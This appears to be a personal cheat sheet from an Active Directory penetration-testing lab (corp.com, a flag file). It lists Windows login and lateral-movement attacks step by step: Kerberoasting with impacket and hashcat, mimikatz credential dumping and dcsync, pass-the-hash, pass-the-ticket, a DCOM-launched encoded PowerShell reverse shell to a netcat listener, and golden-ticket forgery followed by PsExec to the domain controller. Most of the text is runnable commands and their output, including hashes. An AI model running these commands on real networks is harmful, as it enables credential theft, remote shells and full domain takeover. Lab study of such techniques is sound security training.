【Windows】Login methods
Password
How to obtain:
- Password spraying
- crackmapexec
- Hash cracking
# impacket-GetUserSPNs => Kerberoasting attack to obtain the hash
# crack with hashcat
sudo impacket-GetUserSPNs -request -dc-ip 192.168.198.70 corp.com/meg
http/files04.corp.com backupuser CN=Domain Admins,CN=Users,DC=corp,DC=com 2023-12-11 10:36:14.564895 <never>
...
[-] CCache file is not found. Skipping...
$krb5tgs$23$*backupuser$CORP.COM$corp.com/backupuser*$096b74a0a8eadb71d68c1d148eeb9dda$4b0294e2de695f87fa4a024eefafc6ef689ef17e2662f3884c68ebc7cb19f15fe2e82264fa4eb1987584b296426d085463faf4bacf97d70e247449159353d5803fbefdf64734bb42e06a1de083ca392fd5325c42bc1ec23f7781c341f143ce5872ee1b6fcb1eda292514b687b7f36fe97b6d8dbb00060264af8efc7a027470fac2bc480a540b4d282d7a6fd92ebb177941170bde251871b162c7cb52423e5a3265e84fdd9354f42754f4969ac790189cd10e3884ed3f7ddef68ea5e1f8339b06d4ff4f504012f9bfc904d4c27bec891141e473c6b1240433233a5dac4943df3440a4761381e705a4f5cb91924e12322c7dd975734f200ab2609edf9996f77b1c2e121578db8e0e217b539badf48cecc15f3a4ce093af2ca2d6b2ec225586166b77d77a4a3885dace734e7b1447ba68e4e62b1c8bfd50364a73a9e7c38c4b665657417cb7df49482bf4c17429b0b0737e13f3da403be9133a2e98d32a9537bed14c146715a34f415e71c28684d8c6afcd022e61daa0d6d1c93e030f7f90043ad84b616ca46a10a883b3a5fa01dc1eb215806a35ba1f5d8f9cfeb3fe5ca1e03d6478127b45d165d9b4a598d9d29c97e33895dcbf3844ca5faa38a4ba4b19b4a268f21a44e6f40bb7fa9e0b1a481f29f42bdd60df61609755b7f1da9c75ff6685005ce2882b9a0b98d0781eca0f560545180f01c63611c57b47bd222721a5465b95823bf2a8da33115ca52bea80004367694e9e23738300e5bb5294da55846ddc1f3ebd3e3d13ec932a1c7fa8b439d3c452d7899c1fae03ae8078a25c2f61ec91bdbefdd08687636bd45497393249470e4b2ec2ac2877bf57648a06ba432fac6a9995bc53dc8e8e5cebd49bfec93bd4f6e5e2c7639f4310c7e0ea348c3cadf7a5b443a52a53957d04d1bdf30370983f21e2306869a7db7abc13df9416df85eb85e71a0669c8cb2d4ee9a9030eac5c421f0108d8ba763f3102e57d5a220f2bda97693cd1493c9f494298d7ca057fe39bc2ee1213990b8b00bbe1f076d852f171a18a7e5c496b963c61e4c63b7197e0e7500afeaf192e6d84f2694e83df5aef914452bbbc5387cefc0ac906d8a1f11258f89a8bd3651bd5a0ed2e2609f22ee825646e422826413030318cb29df4b04a66b50e2f519007e36942049034e30b13c5d96662a846fe56f524066bedadf246ce6a4a3d1453b664a5dbae36bf5b8361b6a7b7540fb8154404f8c677b70c0b89769293aa5915e77efa1c2c0318bf55755a493e32487a7e37b676b661209aa47f85e9e482072cfbaf18485322b475f0
...
hash -> hashes.kerberoast3
...
sudo hashcat -m 13100 hashes.kerberoast3 /usr/share/wordlists/rockyou.txt -r demo.rule --force
NTLM
How to obtain:
mimikatz.exe + impacket-wmiexec
C:\tools\mimikatz.exe
privilege::debug
lsadump::dcsync /user:corp\Administrator
impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.70
NTLM (no admin: look for an account with equivalent privileges)
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Authentication Id : 0 ; 2421341 (00000000:0024f25d)
Session : RemoteInteractive from 2
User Name : offsec
Domain : CLIENT74
Logon Server : CLIENT74
Logon Time : 2/20/2024 3:50:48 AM
SID : S-1-5-21-4060895957-195960390-4124122524-1001
msv :
[00000003] Primary
* Username : offsec
* Domain : CLIENT74
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
tspkg :
wdigest :
* Username : offsec
* Domain : CLIENT74
* Password : (null)
kerberos :
* Username : offsec
* Domain : CLIENT74
* Password : (null)
/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.72
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
...logged in
NTLM(pth)
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
Authentication Id : 0 ; 1044456 (00000000:000fefe8)
Session : RemoteInteractive from 2
User Name : offsec
Domain : CLIENT76
Logon Server : CLIENT76
Logon Time : 2/20/2024 7:33:53 AM
SID : S-1-5-21-1798880304-3042387037-2047428623-1001
msv :
[00000003] Primary
* Username : offsec
* Domain : CLIENT76
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
tspkg :
wdigest :
* Username : offsec
* Domain : CLIENT76
* Password : (null)
kerberos :
* Username : offsec
* Domain : CLIENT76
* Password : (null)
ssp :
credman :
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:powershell
user : Administrator
domain : corp.com
program : powershell
impers. : no
NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
| PID 4432
| TID 4276
| LSA Process is now R/W
| LUID 0 ; 1854542 (00000000:001c4c4e)
\_ msv1_0 - data copy @ 00000243D6EF4280 : OK !
\_ kerberos - data copy @ 00000243D6FA2B78
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 00000243D6FBE418 (32) -> null
# open a new PowerShell as Administrator
PS C:\Windows\system32> whoami
client76\offsec
# whoami still says offsec, but the Administrator hash has been swapped in
PS C:\Windows\system32> klist
Current LogonId is 0:0x1c4c4e
# no tickets
Cached Tickets: (0)
# connect to web04
PS C:\Windows\system32> net use \\web04
The command completed successfully.
# now 2 tickets
PS C:\Windows\system32> klist
Current LogonId is 0:0x1c4c4e
Cached Tickets: (2)
#0> Client: Administrator @ CORP.COM
Server: krbtgt/CORP.COM @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 12/10/2023 10:52:33 (local)
End Time: 12/10/2023 20:52:33 (local)
Renew Time: 12/17/2023 10:52:33 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC1.corp.com
#1> Client: Administrator @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/10/2023 10:52:33 (local)
End Time: 12/10/2023 20:52:33 (local)
Renew Time: 12/17/2023 10:52:33 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC1.corp.com
# connect to web04 with PsExec.exe
PS C:\Windows\system32> C:\tools\SysinternalsSuite\PsExec.exe \\web04 cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
# now on web04
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\administrator
C:\Windows\system32>
# .... lateral movement succeeded, do something
Pass The Ticket (ptt)
# exported tickets are written to the current directory
cd c:\tools
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::tickets /export
# back in mimikatz, inject the ticket with the following command; injection succeeded
mimikatz # kerberos::ptt [0;104678]-0-0-40810000-dave@cifs-web04.kirbi
* File: '[0;104678]-0-0-40810000-dave@cifs-web04.kirbi': OK
PS C:\Windows\system32> klist
Current LogonId is 0:0xb8f86
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 12/10/2023 11:01:33 (local)
End Time: 12/10/2023 21:01:32 (local)
Renew Time: 12/17/2023 11:01:32 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
# query via SMB
PS C:\Windows\system32> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 5:52 AM 0 backup_schemata.txt
-a---- 12/10/2023 11:01 AM 78 flag.txt
# get the flag
PS C:\Windows\system32> type \\web04\backup\flag.txt
DCOM
# kali
nc -lnvp 443
listening on [any] 443 ...
# connect to the target machine and have it call back to kali with a reverse shell
PS C:\Users\jen\Desktop> $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.248.72"))
# powershell ... base64-encoded reverse shell
PS C:\Users\jen\Desktop> $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4
AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBl.....",
Golden Ticket
SID + krbtgt NTLM hash
C:\tools\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
# sid
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID : 000001f6 (502)
# krbtgt
User : krbtgt
LM :
# krbtgt ntlm
NTLM : 1693c6cefafffc7af11ef34d1c788f47
On the pivot machine
# open a new PowerShell (run as administrator)
PS C:\Users\jen> Start-Process powershell -Verb runAs
PS C:\Windows\system32> cd C:\Tools
PS C:\Tools> .\mimikatz.exe
...omitted
# purge tickets
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
# kerberos::golden /user:{username} /domain:corp.com /sid:{sid} /krbtgt:{krbtgt ntlm} /ptt
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User : jen
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime : 12/10/2023 8:54:47 AM ; 12/7/2033 8:54:47 AM ; 12/7/2033 8:54:47 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jen @ corp.com' successfully submitted for current session
# enable cmd
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF71995B800
####### after exiting, connect to dc1 and run cmd
C:\Tools>cd C:\Tools\SysinternalsSuite
C:\Tools\SysinternalsSuite>.\PsExec.exe \\DC1 cmd.exe